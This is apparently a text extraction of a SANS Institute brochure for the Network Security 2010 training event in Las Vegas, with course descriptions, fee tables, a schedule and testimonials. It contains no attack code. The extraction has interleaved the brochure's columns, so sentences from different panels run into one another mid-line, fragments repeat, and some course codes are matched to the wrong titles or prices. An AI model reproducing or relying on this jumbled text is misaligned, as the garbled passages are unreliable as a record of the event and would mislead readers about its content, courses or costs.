SANS Network Security 2010 - Brochure

Las Vegas
8120 Woodmont Avenue

PRSRT STD
Suite 205
U.S. POSTAGE
Bethesda, MD 20814
PAID September 19-29, 2010
SANS
P R O M O CO D E Dear Colleague,
2010
Please join us for SANS Network Security 2010 at Caesars Palace
THE MOST TRUSTED NAME IN
in Las Vegas, September 19-29, where SANS will provide your best
INFORMATION AND SOFTWARE SECURITY
Hands-on immersion training programs training in the industry today* from the Security, Forensics, Management,
taught by the world’s highest-rated instructors! Audit, and Legal curricula.
Register using this Promo Code and “Getting hands-on At SANS Network Security 2010, you’ll get valuable immersion training from
receive a Special invitation to the
Security Essentials Bootcamp Style
experience with the latest our top SANS instructors and learn skills and tools for dealing with the cyber
SANS Hosted tools and having fun Hacker Techniques, Exploits & Incident Handling threats you face daily. SANS Network Security 2010 offers a high-energy
Presidential Reception learning gives SANS an
program with world-class instructors, a huge Vendor Solutions Expo, hands-on
Network Penetration Testing & Ethical Hacking labs, evening talks and a myriad of networking opportunities to expand your Stephen Northcutt
edge no other training peer group and exchange challenges and solutions.
organization has yet Computer Forensic Investigations & Incident Response
SANS continues to offer the newest and most relevant courses to meet your
SANS is the most trusted and by far the largest source for
Setting the Standard for Security Training
mastered.” Security Leadership Essentials for Managers needs. As you review this brochure, be aware that not only can you select a
information security training, certification, and research in the world. job-based, full course for complete immersion training, but you can also select
-JASON FOWLER, UBC
+S™ Training Program for the CISSP® Cert Exam a short, skill-based course of a day or two either before or after to maximize your
training investment. Course topics include Implementing and Auditing the Twenty
Auditing Networks, Perimeters & Systems Here is what a few
Five Tips to Get Approval for SANS Training ks in
Critical Security Controls – In Depth, Virtualization Security Fundamentals, and much,
of last year’s attendees
SANS WhatWor Intrusion Detection In-Depth much more! Many of the hottest new courses are selling out, so register today!
ance
nd PCI Compli had to say:
1. EXPLORE 4. ADD VALUE
Legal Issues a curity Summit is Networking is a hidden jewel at Network Security 2010! Where else will you meet
n Se
• Read this brochure and note the courses that will enhance your • Share with your boss that you can add value to your experience in Informatio njunction with Web App Penetration Testing and Ethical Hacking others in your field or in your role who deal with the same exploits and challenges
co
role at your organization. by meeting with network security experts - people who face the being held in 10 – Sept 22 - 29. you do? Several networking opportunities are available at SANS Network Security “Again, SANS has
same type of challenges that you face every single day. ri ty 20
Network Secu
• Use the Roadmap to arm yourself with all the necessary …and more than 30 other courses in network and software 2010. Along with your course, you can attend the SANS@Night presentations, managed to take
materials to make a good case for attending a SANS training • Explain how you will be able to get and share great ideas on www.s ans.org/ security, forensics, legal, management, and IT audit.
-2010
-tech-summit evening talks with keynote speakers like Lenny Zeltser and Jason Fossen, and our incredibly complicated
event. improving your IT productivity and efficiency. pci-legal-info
Vendor events. SANS Network Security 2010 Vendor Expo provides a look at solutions material and make it
• Note that the core, job-based courses can be complemented • Enhance your SANS training experience with SANS@Night talks and vendor products that can help address your organization’s key security issues. In
by short, skill-based courses of one or two days. We also offer and the Vendor Expo, which are free and only available at live easy to understand”
addition, we will be featuring Lunch & Learn sessions and Cocktail Briefs throughout
deep discounts for bundled course packages. Consider a GIAC training events.
this event so take advantage of these great networking opportunities. -MARC STOUFER, MEIJER
Certification, which will show the world that you have achieved • Take advantage of the special SANS host hotel rate so you will
proven expertise in your chosen field. be right where the action is! Enhance your learning by attending the Legal Issues & PCI Compliance in Information
2. RELATE 5. ACT Security Summit 2010 being held in conjunction with Network Security 2010. “I like the fact that
• Show how recent problems or issues will be solved with the • With the fortitude and initiative you have demonstrated thus The information technology industry changes daily, and the challenges you face this course contained
knowledge you gain from the SANS course. far, you can confidently seek approval to attend SANS training! are undoubtedly complex. If you know any key stakeholders in the security of your no fluff. All the
• Promise to share what you’ve learned with your colleagues. organization, take them to Las Vegas this fall. They’ll be glad they came! information was of
Return on Investment: SANS training events are
3. SAVE recognized as the best place in the world to get It is our goal to help you get the most out of your SANS Network Security 2010 benefit and no time
• The earlier you sign up, the more you save, so explain the information security education. With SANS, you experience. If you have suggestions on how we can better help you find the
was wasted”
benefit of signing up early. will gain significant return on investment (ROI) for information you need, then I would love to hear from you, stephen@sans.edu.
your InfoSec investment. Through our intensive -AMALIA DOMINGUEZ,
• Save even more with group discounts! See inside for details. See you in Las Vegas!
immersion classes, our training is designed to help NV ENERGY
your staff master the practical steps necessary Kind regards, When you register, be sure to use
for defending systems and networks against the the promo code on the back of this
most dangerous threats – the ones being actively At brochure. Those who do will receive “No other training
Save $400 when you exploited. Caesar’s Palace a special invitation to the has provided such
register for SANS NS2010 Remember: SANS is your first and best choice for Stephen Northcutt
SANS Presidential Reception. instant value to me as a
by August 11, 2010 information and software security training. The President professional and to
www.sans.org/ SANS Promise is “You will be able to apply our The SANS Technology Institute, a postgraduate computer security college my company.
network-security-2010 information security training the day you get back Register at
to the office!” www.sans.org/network-security-2010 *Based on SC Magazine’s Best Professional Training Program Award 2010 -TERRY PACK, WELLPOINT
Las Vegas
PRSRT STD
Suite 205
U.S. POSTAGE
Bethesda, MD 20814
SANS
2010
-JASON FOWLER, UBC
ance
n Se
co
Network Secu
-2010
was wasted”
S A N S T R A I N I
S E C U R I T Y
N G A N D
C U R R I C U L U M
Y O U R C A R E E R R O A D
FORENSICS
M A P SANS Network Security 2010 Registration Fees
Register online at www.sans.org/network-security-2010
Incident Handling
CURRICULUM
SEC501 SEC504 FOR508 Beginners SEC301 NOTE: Intrusion Analysis If you don’t wish to register online,
Advanced Security Hacker Techniques, Computer Forensic If you have experience SEC501 SEC502 SEC503 please call 301-654-SANS(7267) 9:00am - 8:00pm (Mon-Fri) EST and we will fax or mail you an order form.
Essentials – Exploits, and Investigations and SEC301 FOR408
in the field, please Advanced Security Perimeter Intrusion Computer
Enterprise Defender Incident Handling Incident Response Intro to Information
GCED PG 46 GCIH PG 52 GCFA PG 28 Security consider our more Essentials – Protection Detection Forensic Essentials Paid by Paid by Paid after Add Add
advanced course – Enterprise Defender In-Depth In-Depth PG 26
Job-Based Long Courses 8/11/10 8/25/10 8/25/10 GIAC Cert OnDemand
GISF PG 21
GCED PG 46 GCFW PG 48 GCIA PG 50 AUD507 Auditing Networks, Perimeters, and Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,445 $3,595 $3,845 $499 $399
Additional Incident Handling Courses SEC401. DEV522 Defending Web Applications Security Essentials . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,445 $3,595 $3,845
SEC517: Cutting-Edge Hacking Techniques SEC401 Additional Intrusion Analysis Courses FOR408 Computer Forensic Essentials . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,915 $4,065 $4,315 $399
SANS Security FOR508 Computer Forensic Investigations and Incident Response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,645 $3,795 $4,045 $499 $399
SEC550: Information Reconnaissance: Competitive Intelligence and Online Privacy PG 18
Essentials SEC577: Virtualization Security Fundamentals PG 19 FOR508
Computer Forensic FOR558 Network Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,445 $3,595 $3,845
Bootcamp Style Investigations and FOR563 Mobile Device Forensics. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,625 $3,775 $4.025
GSEC PG 44 Incident Response
Penetration Testing System Administration GCFA PG 28
FOR610 Reverse-Engineering Malware: Malware Analysis Tools and Techniques . . . . . . . . . . . . . . . . . . . . . . $2,745 $2,895 $3,145 $499 $399
LEG523 Legal Issues in Information Technology and Information Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,025 $3,175 $3,425 $499 $399
SEC540 SEC542 SEC560 MGT414 SANS® +S™ Training Program for the CISSP® Certification Exam . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,445 $3,595 $3,845 $499 $399
VoIP Web App Pen Network Pen SEC501 SEC505 SEC506
Advanced Security Securing Securing MGT512 SANS Security Leadership Essentials For Managers with Knowledge Compression™ . . . . . . . . . . $3,895 $4,045 $4,295 $499 $399
Security Testing and Ethical Testing and Ethical
Hacking Hacking Essentials – Windows Linux/Unix FOR558 FOR563 MGT525 Project Management & Effective Communications for Security Professionals & Managers . . . . . . . $3,445 $3,595 $3,845 $499
Enterprise Defender
GWAPT PG 60 GPEN PG 62 Network and Application Network Mobile Device SEC301 Intro to Information Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,025 $3,175 $3,425 $499 $399
GCED PG 46 GCWN PG 54 GCUX PG 56 Forensics Forensics SEC401 SANS Security Essentials Bootcamp Style . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,645 $3,795 $4,045 $499 $399
Security PG 30 PG 32 SEC501 Advanced Security Essentials – Enterprise Defender . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,545 $3,695 $3,945 $499 $399
SEC501 SEC509 SEC502 Perimeter Protection In-Depth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,495 $3,645 $3,895 $499 $399
SEC617 SEC709 Advanced Security Securing SEC503 Intrusion Detection In-Depth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,545 $3,695 $3,945 $499 $399
Wireless Ethical Developing Exploits for Essentials – Oracle
Hacking, Pen Testing, Penetration Testers and FOR610 SEC504 Hacker Techniques, Exploits, and Incident Handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,545 $3,695 $3,945 $499 $399
Enterprise Defender SEC505 Securing Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,495 $3,645 $3,895 $499 $399
and Defenses Security Researchers PG 58 REM: Malware
GCED PG 46 Analysis Tools & SEC506 Securing Linux/Unix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,495 $3,645 $3,895 $499 $399
GAWN PG 64 PG 66
Techniques SEC509 Securing Oracle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,595 $3,745 $3,995 $399
Additional Network and Application Security Courses
Additional Penetration Testing Courses GREM PG 34 SEC542 Web Application Penetration Testing and Ethical Hacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,445 $3,595 $3,845 $499 $399
SEC440: 20 Critical Security Controls: Planning, Additional System Administration Courses SEC560 Network Penetration Testing and Ethical Hacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,895 $4,045 $4,295 $499 $399
DEV538: Web App Pen Testing Immersion Implementing, and Auditing
SEC434: Log Management In-Depth SEC566 Implementing & Auditing the Twenty Critical Security Controls - In-Depth . . . . . . . . . . . . . . . . . . . $3,025 $3,175 $3,425
SEC561: Network Penetration Testing: Maximizing the Effectiveness of Reports, SEC556: Comprehensive Packet Analysis PG 18 SEC617 Wireless Ethical Hacking, Penetration Testing, and Defenses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,595 $3,745 $3,995 $499 $399
Exploits, and Command Shells SEC531: Windows Command-Line Kung Fu Additional Forensics Courses
SEC565: Data Leakage Prevention - In Depth PG 17 SEC709 Developing Exploits for Penetration Testers and Security Researchers . . . . . . . . . . . . . . . . . . . . . . . . $3,745 $3,895 $4,145
SEC567: Power Packet Crafting with Scapy PG 18 SEC566: Implementing & Auditing the Twenty Critical SEC546: IPv6 Essentials PG 18 FOR526: Advanced Filesystem Recovery and HOSTED Drive and Data Recovery Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $3,625 $3,775 $4,025
SEC580: Metasploit Kung Fu for Enterprise Pen Testing PG 19 Security Controls - In-Depth PG 20 SEC564: Hacker Detection for System Administrators PG 19 Memory Forensics PG 17 HOSTED (ISC)2® Certified Secure Software Lifecycle Professional (CSSLP) CBK® Education Program . . . . . $2,745 $2,895 $3,145
If taking
a 5-6 day
Skill-Based Short Courses
A P P L I C AT I O N S E C U R I T Y AUDIT LEGAL MANAGEMENT DEV541 Secure Coding in Java/JEE: Developing Defensible Applications . . . . . . . . . . . . . . . . . . . .
course
N/A $2,645 $2,795 $3,045 $499 $399
CURRICULUM CURRICULUM CURRICULUM CURRICULUM FOR526 Advanced Filesystem Recovery and Memory Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $575 $995 $995 $995 $99
MGT305 Technical Communication and Presentation Skills for Security Professionals . . . . . . . . $855 $1,275 $1,275 $1,275
MGT404 Fundamentals of Information Security Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $855 $1,275 $1,275 $1,275 $99
Design & Test Secure Coding SEC301 SEC401 SEC301 SEC301 SEC301 SEC401
MGT421 SANS Leadership and Management Competencies. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $675 $1,095 $1,095 $1,095 $99
Intro to SANS Security Intro to Information Intro to Intro to SANS Security
DEV522 DEV530 DEV543 Information Essentials Security Information Information Essentials MGT570 Social Engineering Defense . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $1,150 $1,700 $1,700 $1,700
Defending Web Essential Secure Secure Coding Security Bootcamp Style GISF PG 21 Security Security Bootcamp Style SEC546 IPv6 Essentials . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $575 $995 $995 $995
Applications Coding in Java/JEE in C & C++ GISF PG 21 GSEC PG 44 GISF PG 21 GISF PG 21 GSEC PG 44 SEC550 IPv6 Essentials . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $575 $995 $995 $995 $99
Security Essentials SEC556 Comprehensive Packet Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $575 $995 $995 $995 $99
PG 22 SEC564 Hacker Detection for System Administrators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $1,150 $1,700 $1,700 $1,700
DEV541 DEV544 SEC401
SANS Security SEC565 Data Leakage Prevention – In Depth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N/A $2,645 $2,795 $3,045
Secure Coding Secure Coding Essentials
SEC542 in Java/JEE in .NET AUD507 MGT512 MGT414 MGT525 SEC567 Power Packet Crafting with Scapy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $575 $995 $995 $995
Auditing Networks, Bootcamp Style
Web App GSSP-JAVA PG 15 GSSP-.NET SANS Security SANS® +S™ Project Management SEC577 Virtualization Security Fundamentals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $1,250 $1,800 $1,800 $1,800
Pen Testing and Perimeters, GSEC PG 44
Leadership Essentials Training Program and Effective SEC580 Metasploit Kung Fu for Enterprise Pen Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $1,150 $1,700 $1,700 $1,700
Ethical Hacking and Systems For Managers for the Communications for
GWAPT PG 60 DEV545 GSNA PG 24 with Knowledge CISSP® Certification Security Professionals Individual Courses Available Individual Course Day Rates If Not Taking a Full Course
Secure Coding LEG523 Compression™ Exam and Managers MON 9/20 TUE 9/21 WED 9/22 THU 9/23 FRI 9/24 SAT 9/25
Legal Issues in Paid by Paid by Paid after
in PHP GSLC PG 40 GISP PG 38 GCPM PG 42 AUD507 507.1 507.2 & 507.3 507.4 507.5 507.6 8/11/10 8/25/10 8/25/10
Information
GSSP-PHP Additional Audit Courses Technology and LEG523 523.1 523.2 523.3 523.4 523.5 One Full Day . . . . . . . . . . . . . . . . . . . . . . . . . . . $1,325 $1,325 $1,325
Information Security SEC301 301.1 301.2 301.3 301.4 301.5 Two Full Days . . . . . . . . . . . . . . . . . . . . . . . . . . $2,050 $2,050 $2,050
AUD305: Technical Communication & Presentation Skills
GLEG PG 13 SEC401 401.1 401.2 401.3 401.4 401.5 401.6 Three Full Days. . . . . . . . . . . . . . . . . . . . . . . . . $3,000 $3,000 $3,000
AUD423: Training for the ISACA® CISA® Cert Exam Additional Management Courses
501.1 501.2 501.3 501.4 501.5 501.6 Four Full Days . . . . . . . . . . . . . . . . . . . . . . . . . . $3,250 $3,250 $3,250
Code Review MGT305: Technical Communication and Presentation Skills PG 15
SEC501
AUD429: IT Security Audit Essentials Bootcamp SEC503 503.1 Five Full Days . . . . . . . . . . . . . . . . . . . . . . . . . . $3,800 $3,800 $3,800
DEV534 MGT404: Fundamentals of Information Security Policy PG 16 SEC504 504.1 Six Full Days . . . . . . . . . . . . . . . . . . . . . . . . . . . $4,350 $4,350 $4,350
AUD521: Meeting the Minimum: PCI/DSS 1.2:
Secure Code Review Becoming and Staying Compliant PG 12 SEC505 505.1 505.2 505.3 505.4 505.5 505.6 Seven Full Days . . . . . . . . . . . . . . . . . . . . . . . . $4,950 $4,950 $4,950
for Java Web Apps GIAC certification MGT421: SANS Leadership and Management Competencies PG 16 Eight Full Days . . . . . . . . . . . . . . . . . . . . . . . . . $5,550 $5,550 $5,550
SEC506 506.1 506.2 506.3 506.4 506.5 506.6
Additional Secure Coding Courses SEC440: 20 Critical Security Controls: available for courses MGT432: Information Security for Business Executives
Planning, Implementing, and Auditing indicated with
DEV304: Software Security Awareness MGT438: How to Establish a Security Awareness Program R E M I N D E R :
SEC566: Implementing & Auditing the Twenty Critical GIAC acronyms
DEV536: Secure Coding for PCI Compliance Security Controls - In-Depth PG 20 MGT570: Social Engineering Defense PG 16 When you register, please use the promo code located on the back cover.
Courses-at-a-Glance
w
SUN MON TUE WED THU FRI SAT SUN MON TUE WED
9/19 9/20 9/21 9/22 9/23 9/24 9/25 9/26 9/27 9/28 9/29
AUD507 Auditing Networks, Perimeters, and Systems PAGE 24
DEV522 Defending Web Applications Security Essentials PAGE 22
DEV541 Secure Coding in Java/JEE: Developing Defensible Applications PAGE 15
w
FOR408 Computer Forensic Essentials PAGE 26
FOR508 Computer Forensic Investigations and Incident Response PAGE 28
FOR526 Advanced Filesystem Recovery and Memory Forensics P 17
FOR558 Network Forensics PAGE 30
FOR563 Mobile Device Forensics PAGE 32
w
FOR610 REM: Malware Analysis Tools and Techniques PAGE 34
HOSTED Drive and Data Recovery Forensics PAGE 36
MGT305 Technical Communication and Presentation Skills for P 15
Security Professionals
MGT404 Fundamentals of Information Security Policy P 16
•
MGT414 SANS® +S™ Training Program for the CISSP® Certification Exam PAGE 38
MGT421 SANS Leadership and Management Competencies P 16
MGT512 SANS Security Leadership Essentials for Managers with PAGE 40
Knowledge Compression™
MGT525 Project Management and Effective Communications for PAGE 42
Security Professionals and Managers
MGT570 Social Engineering Defense
SEC301 Intro to Information Security
SEC401 SANS Security Essentials Bootcamp Style
PAGE 21
PAGE 44
P 16
s
SEC501 Advanced Security Essentials – Enterprise Defender PAGE 46
a
SEC502 Perimeter Protection In-Depth PAGE 48
SEC503 Intrusion Detection In-Depth PAGE 50
SEC504 Hacker Techniques, Exploits, and Incident Handling PAGE 52
SEC505 Securing Windows PAGE 54
SEC506 Securing Linux/Unix PAGE 56
n
SEC509 Securing Oracle PAGE 58
SEC542 Web App Penetration Testing and Ethical Hacking PAGE 60
SEC546 IPv6 Essentials P 18
SEC550 Information Reconnaissance: Competitive Intelligence P 18
and Online Privacy
P 18
s
SEC556 Comprehensive Packet Analysis
SEC560 Network Penetration Testing and Ethical Hacking PAGE 62
SEC564 Hacker Detection for System Administrators P 19
SEC565 Data Leakage Prevention - In Depth PAGE 17
SEC566 Implementing & Auditing the 20 Critical Security Controls - In-Depth PAGE 20
•
SEC567 Power Packet Crafting with Scapy P 18
SEC577 Virtualization Security Fundamentals P 19
SEC580 Metasploit Kung Fu for Enterprise Pen Testing P 19
SEC617 Wireless Ethical Hacking, Penetration Testing, and Defenses PAGE 64
SEC709 Developing Exploits for Penetration Testers & Security Researchers PAGE 66
o
HOSTED (ISC)2® Certified Secure Software Lifecycle Professional
PAGE 68
(CSSLPCM) CBK® Education Program
SANS WhatWorks in Legal Issues & PCI in Information Security Summit 2010 P 12
LEG523 Legal Issues in Information Technology and Information Security PAGE 13
AUD521 Meeting the Minimum: PCI/DSS 1.2: Becoming & Staying Compliant P 12
r
Please check the Web site for an up-to-date course list at www.sans.org/network-security-2010
Training and Your Career Roadmap . . . . . . . . . . . . . . . . . 2-5 SANS Cyber Guardian Program . . . . . . . . . . . . . . . . . . . . . .14
Earn Your GIAC Certification. . . . . . . . . . . . . . . . . . . . . . . . . . 6 Future SANS Training Events . . . . . . . . . . . . . . . . . . . . . . . .69
DoD Directive 8570 Information . . . . . . . . . . . . . . . . . . . . . 7 Hotel and Travel Information . . . . . . . . . . . . . . . . . . . . . . . .70
g
Special / Vendor Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8-9 Reasons to Come to Baltimore . . . . . . . . . . . . . . . . . . . . . .71
SANS Technology Institute . . . . . . . . . . . . . . . . . . . . . . .10-11 Registration Information . . . . . . . . . . . . . . . . . . . . . . . . . . .72
Legal Issues & PCI Compliance in Information Security Summit 12-13 Registration Fees . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .73
S A N S T R A I N I N G A N D Y O U R C A R E E R R O A D M A P
Just Starting a Career in Security and Need a Good Foundation? Need to Implement an Application Security Program?
SEC401: SANS Security SEC501: Advanced Security NEW! DEV522: Defending Web Application DEV541: Secure Coding in Java/JEE: Developing
Essentials Bootcamp Style Essentials – Enterprise Defender Security Essentials Page 22 Defensible Applications (GSSP-JAVA) Page 15
(GSEC) Page 44 (GCED) Page 46 Defending Web applications is critical! Traditional network defenses, During this four-day course is a comprehensive course covering
Maximize your training time and turbo- Cyber security continues to be a critical such as firewalls, fail to secure Web applications which have to be a huge set of skills and knowledge; it’s not a high-level theory
charge your career in security by learning area for organizations and will continue to available to large user communities. The amount and importance of course. It’s about real programming. In this course you will
the full SANS Security Essentials curriculum increase in importance as attacks become data entrusted to Web applications is growing, and defenders need examine actual code, work with real tools, build applications,
needed to qualify for the GSEC certification. stealthier, have a greater financial impact to learn how to secure it. DEV522 covers the and gain confidence in the re-
SEC301: Intro to Information
In this course you will learn the language on an organization, and cause reputational OWASP Top 10 and will help you to better sources you need for the journey
Security (GISF) Page 21
and underlying theory of computer security. damage. Security 501 is a follow-on to understand Web application vulnerabilities, to improving security of Java
SANS is the MIT of information security, At the same time you will learn the essen- Security 401 (with no overlap) and continues thus enabling you to properly defend your applications.
and this introductory certification course is tial, up-to-the-minute knowledge and skills to focus on more technical areas that are organization’s Web assets. “This class has made me
the fastest possible way to get up to speed. required for effective performance if you are needed to protect an organization. “While I understand the basic think about data validation
Understand the threats and risks to infor- given the responsibility for securing systems thoughts behind Web application in ways that I had not
“The course content is extensive
mation resources, and identify generally and/or organizations. and covers all the areas that are security, this class gave me a greater thought of before.”
accepted best practices. relevant for a security professional breadth and depth of knowledge.” -RICK STONE, UMPQUA BANK
“Security 401 is a wonderfully compre-
-MISS KOOS, MICHIGAN STATE UNIVERSITY
“This fundamental course sets hensive course for all IT professionals. in today’s IT world. The instructor www.sans-ssi.org
the groundwork for a There is something for everyone, and was great – very experienced
successful future in IT security.” it is a great springboard for all of the and knowledgeable.”
-BRIAN FRICKE, US NAVY/MSC other courses at SANS.” -ANDREA TODD -KAYODE OLOKE, TORYS LLP
Want to Specialize in Pen Testing?
SEC542: Web App Penetration Testing and SEC617: Wireless Ethical Hacking, Penetration
Want to Specialize in Want to Advance Your Ethical Hacking (GWAPT) Page 60 Testing, and Defenses (GAWN) Page 64
System Administration? Technical Skills? Web applications are a major point of vulnerability in organiza- Few fields are as complex as wireless security. This course breaks down
tions today. Web app holes have resulted in the theft of millions the issues and relevant standards that affect wireless network admin-
SEC505: Securing Windows SEC503: Intrusion Detection of credit cards, major financial and reputational damage for istrators, auditors, and information security professionals. With hands-
(GCWN) Page 54 In-Depth (GCIA) Page 50 hundreds of enterprises, and even the compromise of thousands on labs and instruction from industry wireless security experts, you
This program brings the confusing The emphasis of this course is on increasing of browsing machines that visited Web sites altered by attack- will gain an intimate understanding of the risks threatening wireless
complexity of Windows security into students’ understanding of the workings of TCP/IP, ers. In this class you’ll learn the art of exploiting Web applica- networks. After identifying risks and attacks, we’ll present field-proven
clear focus by starting with foundational methods of network traffic analysis, and one spe- tions so you can find flaws in your enterprise’s Web apps before techniques for mitigating these risks, leveraging powerful open-source
security services and advancing in a logi- cific network intrusion detection system – Snort. the bad guys do. and commercial tools for Linux and Windows systems.
cal progression to particular products or This course is not a comparison or demonstration “Never will you learn so much and have such a great “This course is absolutely critical for any IT professional
features which rely on these foundations, of multiple NIDS. Instead, the knowledge/infor- time doing it. Kevin Johnson is an incredible teacher.” responsible for overseeing an existing wireless network.”
such as IIS and IPSec. Securing Windows mation provided here allows students to better -TOM COOK, US ARMY -JOSHUA BROWN, FLEISHMAN HILLARD
is fully updated for Windows Server 2008- understand the qualities that go into a sound NIDS and the whys behind them, and thus
R2 and Windows 7. Most of the content be better equipped to make a wise selection for their site’s particular needs. SEC560: Network Penetration Testing and SEC709: Developing Exploits for Penetration Testers
applies to Windows Server 2003 and XP “There’s nothing that compares to the detail and Ethical Hacking (GPEN) Page 62 and Security Researchers Page 66
too, but the focus is on 2008/Vista/7. Learn real-world content in this course.” Successful penetration testers don’t just throw a bunch of hacks In this course we bridge the gaps and take a step-by-step look at Linux
to implement the 20 Critical Controls -JOHN DASKAL, LOCKHEED MARTIN against an organization and regurgitate the output of their and Windows operating systems and how exploitation truly works under
relevant to Windows systems. tools. Instead, they need to understand how these tools work in the hood. This five-day course rapidly progresses through exploitation
“The course introduced a wide range SEC504: Hacker Techniques, Exploits, and Incident Handling depth and conduct their test in a careful, professional manner. techniques used to attack stacks, heaps, and other memory segments
of technologies and issues I was (GCIH) Page 52 This course explains the inner workings of numerous tools and on Linux and Windows. This is a fast-paced course that provides you with
completely unaware of – Learn to detect malicious code and respond on the fly. You’ll learn how your networks ap- their use in effective network penetration testing and ethical the skills to hit the ground running with vulnerability research.
great exposure to new ideas. pear to hackers, how they gain access with special emphasis on the newer attack vectors, hacking projects. “As a software developer, it opened my mind
Jason’s depth of knowledge and
and what they do when they get in – especially in manipulating the system to hide their “This course continually provides clear exercises that to how vulnerable some of my code could be,
examples are of great value.”
work. Master the proven six-step process of incident handling so you are prepared to be concisely demonstrate each concept without extra fluff.” and how to protect it in the future”
-DAVID THORNBURG, SRC
the technical leader of the incident handling team. -JASON MANSFIELD, ANONYMIZER, INC. -JOHN CUTTER, SPAWAR
“The information presented is scary good. For detailed descriptions of all SANS courses, visit: www.sans.org
Really makes you examine your current knowledge from new angles.”
For GIAC Certification information, visit: www.giac.org
2 SANS Network Security 2010
September 19 - 29, 2010
-KURT BENNETT, GENERAL DYNAMICS
For SANS Technology Institute advanced degree information, visit: www.sans.edu
SANS Network Security 2010
September 19 - 29, 2010 3
S A N S T R A I N I N G A N D Y O U R C A R E E R R O A D M A P
Want to Specialize in Forensics? Want to Learn Security from a Management Perspective?
FOR408: Computer Forensic Essentials Page 26 MGT414: SANS® +S™ Training MGT525: Project Management
This course focuses on the essentials that a forensic investigator Program for the CISSP® and Effective Communications
must know to investigate core computer crime incidents successfully. Certification Exam (GISP) for Security Professionals and
You will learn how computer forensic analysts focus on collecting Page 38 Managers (GCPM) Page 42
and analyzing data from computer systems to track user-based http://computer- The SANS CISSP® review course will cover This curriculum is intended to give you the
activity that could be used internally or in civil/criminal litigation. the security concepts needed in order to knowledge and tools you need to become a
“This is an excellent hands-on course and with an awesome
forensics.sans.org pass the CISSP® exam. This accelerated MGT512: SANS Security top-notch project manager with a focus on
review course assumes the student has Leadership Essentials for effective communication, human resourc-
instructor who pays attention to the audience’s skills,
a basic understanding of networks and Managers with Knowledge es, and quality management. The course
teaching accordingly. I love this class!”
operating systems and focuses solely Compression™ (GSLC) Page 40 covers all aspects of project management
-PHYLLIS HELLMAN, BOEING COMPANY
on the ten domains of knowledge as This course is designed to empower senior and from planning and initiating projects to
determined by (ISC)2. Each domain of advancing managers who want to get up to managing cost, time, and quality while
knowledge is dissected into its criti- speed fast on information security issues and your project is active and then complet-
FOR508: Computer Forensic Investigations and FOR563: Mobile Device Forensics Page 32 cal components. Every component is terminology. Lecture sections are intense. The ing, closing, and documenting after the
Incident Response (GCFA) Page 28 This hands-on course provides the core knowledge and skills that a discussed showing its relationship to diligent manager will learn vital, up-to-date project finishes. A copy of the Project
Network equipment, such as Web proxies, firewalls, IDS, routers, digital forensic investigator needs to process cell phones, PDAs, and each other and other areas of network knowledge and skills required to supervise Management Institute’s Guide to the Project
and even switches, contains evidence that can make or break a other mobile devices. Using state-of-the art tools, you will learn security. This course also prepares you the security component of any information Management Body of Knowledge (PMBOKR
how to forensically preserve, acquire, and examine data stored on for the GISP certification. (Note: The technology project. Only SANS’ top instructors Guide®) - Fourth Edition is provided to all
case. You will learn how to recover evidence from network-based
mobile devices and utilize the results for internal investigations or CISSP® exam is NOT provided as part of are invited to teach this course. participants.
devices and use it to build your case. Each student will be given a
